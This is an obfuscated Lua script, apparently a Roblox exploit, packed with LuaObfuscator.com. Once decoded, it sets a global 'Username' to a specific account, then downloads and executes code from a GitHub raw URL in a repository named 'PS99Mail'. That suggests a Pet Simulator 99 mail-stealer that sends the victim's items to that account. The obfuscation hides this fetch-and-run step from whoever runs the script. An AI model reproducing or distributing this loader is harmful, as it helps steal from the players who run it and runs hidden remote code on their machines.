--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.19) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then local v67=0;while true do if (v67==0) then v19=v0(v3(v30,1,1));return "";end end else local v68=v2(v0(v30,16));if v19 then local v76=v5(v68,v19);v19=nil;return v76;else return v68;end end end);local function v20(v31,v32,v33)if v33 then local v69=0 -0 ;local v70;while true do if (v69==(1065 -(68 + 997))) then v70=(v31/((5 -3)^(v32-(1 -0))))%((4 -(1272 -(226 + 1044)))^(((v33-((2699 -2079) -(555 + 64))) -(v32-(932 -(857 + 74)))) + (569 -(367 + 201)))) ;return v70-(v70%(928 -(214 + 713))) ;end end else local v71=0 + 0 ;local v72;while true do if (v71==(0 + 0)) then v72=(879 -(282 + 595))^(v32-(1638 -((1640 -(32 + 85)) + 114))) ;return (((v31%(v72 + v72))>=v72) and (1 + 0)) or (0 -0) ;end end end end local function v21()local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22()local v35,v36=v1(v16,v18,v18 + 2 );v18=v18 + 2 + 0 ;return (v36 * (1213 -(892 + 65))) + v35 ;end local function v23()local v37,v38,v39,v40=v1(v16,v18,v18 + ((3 + 1) -1) );v18=v18 + (354 -(87 + 263)) ;return (v40 * (40022563 -23245347)) + (v39 * (48056 + 17480)) + (v38 * ((1875 -1403) -216)) + v37 ;end local function v24()local v41=v23();local v42=v23();local v43=953 -((1244 -(416 + 26)) + 150) ;local v44=(v20(v42,2 -1 ,20) * ((3 -1)^(24 + 8))) + v41 ;local v45=v20(v42,1018 -(915 + (261 -179)) ,87 -56 );local v46=((v20(v42,19 + 13 )==(1 -0)) and  -(1 + 0)) or (1188 -(1069 + 118)) ;if (v45==0) then if (v44==(0 -0)) then return v46 * 0 ;else v45=1 -(0 -0) ;v43=0 + 0 ;end elseif (v45==(3636 -1589)) then return ((v44==(0 + 0)) and (v46 * (1/(791 -(368 + 423))))) or (v46 * NaN) ;end return v8(v46,v45-((3652 -(145 + 293)) -2191) ) * (v43 + (v44/((20 -(10 + 8))^(199 -147)))) ;end local function v25(v47)local v48=430 -((77 -33) + (1466 -(1020 + 60))) ;local v49;local v50;while true do if (v48==(7 -5)) then v50={};for v77=1, #v49 do v50[v77]=v2(v1(v3(v49,v77,v77)));end v48=1489 -(998 + 488) ;end if (v48==(1 + 2)) then return v6(v50);end if (v48==(1 + 0)) then v49=v3(v16,v18,(v18 + v47) -(773 -(201 + 571)) );v18=v18 + v47 ;v48=1140 -(116 + 1022) ;end if ((0 + 0)==v48) then v49=nil;if  not v47 then v47=v23();if (v47==(0 -0)) then return "";end end v48=886 -(261 + 624) ;end end end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v51=0;local v52;local v53;local v54;local v55;local v56;local v57;local v58;local v59;while true do if (0==v51) then v52=0;v53=nil;v51=1;end if (4==v51) then while true do if (v52~=1) then else local v96=0;local v97;while true do if (v96==(0 -0)) then v97=0 -0 ;while true do if (v97==(1637 -(1373 + 263))) then v52=1002 -(451 + 549) ;break;end if (v97==(0 + 0)) then local v116=0;while true do if (v116==1) then v97=1 -0 ;break;end if (v116~=0) then else v55=nil;v56=nil;v116=1 -0 ;end end end end break;end end end if (v52==0) then local v98=0;local v99;while true do if (v98~=(1384 -(746 + 638))) then else v99=0;while true do if ((0 + 0)~=v99) then else v53=0 -0 ;v54=nil;v99=1;end if (v99~=(342 -(218 + 123))) then else v52=1;break;end end break;end end end if (v52~=2) then else local v100=1581 -(1535 + 46) ;while true do if (1==v100) then v52=3 + 0 ;break;end if (v100==0) then v57=nil;v58=nil;v100=1;end end end if ((1 + 2)~=v52) then else v59=nil;while true do local v101=560 -(306 + 254) ;local v102;local v103;while true do if (v101~=1) then else while true do if (v102==0) then v103=0 + 0 ;while true do if (v103==(0 -0)) then local v160=1467 -(899 + 568) ;while true do if ((0 + 0)==v160) then if (v53==0) then local v163=0;local v164;while true do if (v163~=0) then else v164=0 -0 ;while true do if (v164~=0) then else local v168=603 -(268 + 335) ;while true do if (v168==1) then v164=291 -(60 + 230) ;break;end if (v168~=(572 -(426 + 146))) then else v54={};v55={};v168=1 + 0 ;end end end if (v164==(1458 -(282 + 1174))) then v53=1;break;end if (v164==1) then local v169=0;while true do if (v169==(811 -(569 + 242))) then v56={};v57={v54,v55,nil,v56};v169=1;end if (v169==(1025 -(706 + 318))) then v164=1253 -(721 + 530) ;break;end end end end break;end end end if (v53==(1272 -(945 + 326))) then local v165=0 -0 ;while true do if ((1 + 0)==v165) then local v167=700 -(271 + 429) ;while true do if (v167==1) then v165=2;break;end if (v167==(0 + 0)) then for v171=1501 -(1408 + 92) ,v58 do local v172=1086 -(461 + 625) ;local v173;local v174;local v175;local v176;while true do if (v172==2) then while true do if ((1288 -(993 + 295))~=v173) then else local v184=0;while true do if (0~=v184) then else v174=0;v175=nil;v184=1 + 0 ;end if (v184==1) then v173=1;break;end end end if (v173==1) then v176=nil;while true do if (v174~=0) then else local v185=1171 -(418 + 753) ;while true do if (v185~=(1 + 0)) then else v174=1 + 0 ;break;end if (v185~=(0 + 0)) then else local v192=0 + 0 ;while true do if (v192==(530 -(406 + 123))) then v185=1;break;end if (v192==(1769 -(1749 + 20))) then v175=v21();v176=nil;v192=1 + 0 ;end end end end end if (1==v174) then if (v175==(1323 -(1249 + 73))) then v176=v21()~=(0 + 0) ;elseif (v175==2) then v176=v24();elseif (v175~=(1148 -(466 + 679))) then else v176=v25();end v59[v171]=v176;break;end end break;end end break;end if (1~=v172) then else v175=nil;v176=nil;v172=2;end if (0~=v172) then else v173=0 -0 ;v174=nil;v172=1;end end end v57[3]=v21();v167=2 -1 ;end end end if (v165==(1900 -(106 + 1794))) then v58=v23();v59={};v165=1;end if (v165~=2) then else v53=1 + 1 ;break;end end end v160=1 + 0 ;end if (1~=v160) then else v103=1;break;end end end if ((2 -1)==v103) then if (v53==2) then local v161=0 -0 ;local v162;while true do if (v161==(114 -(4 + 110))) then v162=0;while true do local v166=0;while true do if (0==v166) then if (v162==0) then for v177=1,v23() do local v178=0;local v179;local v180;local v181;while true do if (v178~=0) then else v179=584 -(57 + 527) ;v180=nil;v178=1428 -(41 + 1386) ;end if (v178==(104 -(17 + 86))) then v181=nil;while true do if (v179~=0) then else v180=0 + 0 ;v181=nil;v179=1;end if (v179==1) then while true do if (v180==(0 -0)) then v181=v21();if (v20(v181,1,1)~=(0 -0)) then else local v187=0;local v188;local v189;local v190;local v191;while true do if (v187==(168 -(122 + 44))) then while true do if (v188==2) then local v194=0;while true do if (0~=v194) then else if (v20(v190,1,1)==(1 -0)) then v191[6 -4 ]=v59[v191[2]];end if (v20(v190,2 + 0 ,2)==(1 + 0)) then v191[5 -2 ]=v59[v191[68 -(30 + 35) ]];end v194=1;end if (v194==(1 + 0)) then v188=3;break;end end end if (v188~=1) then else local v195=0;while true do if (v195==(1257 -(1043 + 214))) then v191={v22(),v22(),nil,nil};if (v189==(580 -(361 + 219))) then local v203=320 -(53 + 267) ;local v204;while true do if ((0 + 0)~=v203) then else v204=0;while true do if (v204~=0) then else v191[416 -(15 + 398) ]=v22();v191[986 -(18 + 964) ]=v22();break;end end break;end end elseif (v189==1) then v191[11 -8 ]=v23();elseif (v189==2) then v191[3]=v23() -(2^(10 + 6)) ;elseif (v189==3) then local v209=0 + 0 ;local v210;local v211;while true do if (1==v209) then while true do if (v210==0) then v211=850 -(20 + 830) ;while true do if (v211~=0) then else v191[3 + 0 ]=v23() -(2^(142 -(116 + 10))) ;v191[4]=v22();break;end end break;end end break;end if (v209==(0 + 0)) then v210=738 -(542 + 196) ;v211=nil;v209=1;end end end v195=1;end if (1~=v195) then else v188=2;break;end end end if (v188~=(6 -3)) then else if (v20(v190,3,3)==(1 + 0)) then v191[3 + 1 ]=v59[v191[4]];end v54[v177]=v191;break;end if (v188==(0 + 0)) then v189=v20(v181,4 -2 ,3);v190=v20(v181,9 -5 ,1557 -(1126 + 425) );v188=1;end end break;end if (v187==1) then v190=nil;v191=nil;v187=2;end if (v187==(405 -(118 + 287))) then local v193=0;while true do if (v193==(0 -0)) then v188=1121 -(118 + 1003) ;v189=nil;v193=2 -1 ;end if (v193~=1) then else v187=378 -(142 + 235) ;break;end end end end end break;end end break;end end break;end end end for v182=1,v23() do v55[v182-1 ]=v28();end v162=1;end if ((4 -3)~=v162) then else return v57;end break;end end end break;end end end break;end end break;end end break;end if (v101~=0) then else v102=0;v103=nil;v101=1;end end end break;end end break;end if (v51==(1 + 1)) then v56=nil;v57=nil;v51=980 -(553 + 424) ;end if (1~=v51) then else v54=nil;v55=nil;v51=3 -1 ;end if ((3 + 0)~=v51) then else v58=nil;v59=nil;v51=4 + 0 ;end end end local function v29(v60,v61,v62)local v63=0;local v64;local v65;local v66;while true do if (v63==0) then v64=v60[1];v65=v60[2];v63=1;end if (v63==1) then v66=v60[3];return function(...)local v79=v64;local v80=v65;local v81=v66;local v82=v27;local v83=1;local v84= -1;local v85={};local v86={...};local v87=v12("#",...) -1 ;local v88={};local v89={};for v93=0,v87 do if (v93>=v81) then v85[v93-v81 ]=v86[v93 + 1 ];else v89[v93]=v86[v93 + 1 ];end end local v90=(v87-v81) + 1 ;local v91;local v92;while true do v91=v79[v83];v92=v91[1];if (v92<=5) then if (v92<=2) then if (v92<=0) then local v108=v91[2];local v109,v110=v82(v89[v108](v13(v89,v108 + 1 ,v91[3])));v84=(v110 + v108) -1 ;local v111=0;for v117=v108,v84 do local v118=0;while true do if (v118==0) then v111=v111 + 1 ;v89[v117]=v109[v111];break;end end end elseif (v92==1) then v89[v91[2]]();else local v119=v91[2];local v120=v89[v91[3]];v89[v119 + 1 ]=v120;v89[v119]=v120[v91[4]];end elseif (v92<=3) then if (v89[v91[2]]==v91[4]) then v83=v83 + 1 ;else v83=v91[3];end elseif (v92>4) then if ((v91[3]=="_ENV") or (v91[3]=="getfenv")) then v89[v91[2]]=v62;else v89[v91[2]]=v62[v91[3]];end else v83=v91[3];end elseif (v92<=8) then if (v92<=6) then local v112=0;local v113;while true do if (v112==0) then v113=v91[2];v89[v113]=v89[v113](v13(v89,v113 + 1 ,v84));break;end end elseif (v92==7) then for v144=v91[2],v91[3] do v89[v144]=nil;end else do return;end end elseif (v92<=9) then v89[v91[2]]=v91[3];elseif (v92>10) then local v126;local v127,v128;local v129;local v130;v62[v91[3]]=v89[v91[2]];v83=v83 + 1 ;v91=v79[v83];if ((v91[3]=="_ENV") or (v91[3]=="getfenv")) then v89[v91[2]]=v62;else v89[v91[2]]=v62[v91[3]];end v83=v83 + 1 ;v91=v79[v83];if ((v91[3]=="_ENV") or (v91[3]=="getfenv")) then v89[v91[2]]=v62;else v89[v91[2]]=v62[v91[3]];end v83=v83 + 1 ;v91=v79[v83];v130=v91[2];v129=v89[v91[3]];v89[v130 + 1 ]=v129;v89[v130]=v129[v91[4]];v83=v83 + 1 ;v91=v79[v83];v89[v91[2]]=v91[3];v83=v83 + 1 ;v91=v79[v83];v130=v91[2];v127,v128=v82(v89[v130](v13(v89,v130 + 1 ,v91[3])));v84=(v128 + v130) -1 ;v126=0;for v146=v130,v84 do v126=v126 + 1 ;v89[v146]=v127[v126];end v83=v83 + 1 ;v91=v79[v83];v130=v91[2];v89[v130]=v89[v130](v13(v89,v130 + 1 ,v84));v83=v83 + 1 ;v91=v79[v83];v89[v91[2]]();v83=v83 + 1 ;v91=v79[v83];v83=v91[3];else v62[v91[3]]=v89[v91[2]];end v83=v83 + 1 ;end end;end end end return v29(v28(),{},v17)(...);end v15("LOL!073O00028O0003083O00557365726E616D65030E3O006A6F736875615F63617361796173030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403433O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4C7970686572582F50532O394D61696C2F6D61696E2F4D656D656E746F6D6F726900153O0012093O00014O0007000100013O0026033O000200010001002O043O00020001001209000100013O0026030001000500010001002O043O00050001001209000200033O00120B000200023O00122O000200043O00122O000300053O00202O00030003000600122O000500076O000300056O00023O00024O00020001000100044O00140001002O043O00050001002O043O00140001002O043O000200012O00083O00017O00",v9(),...);
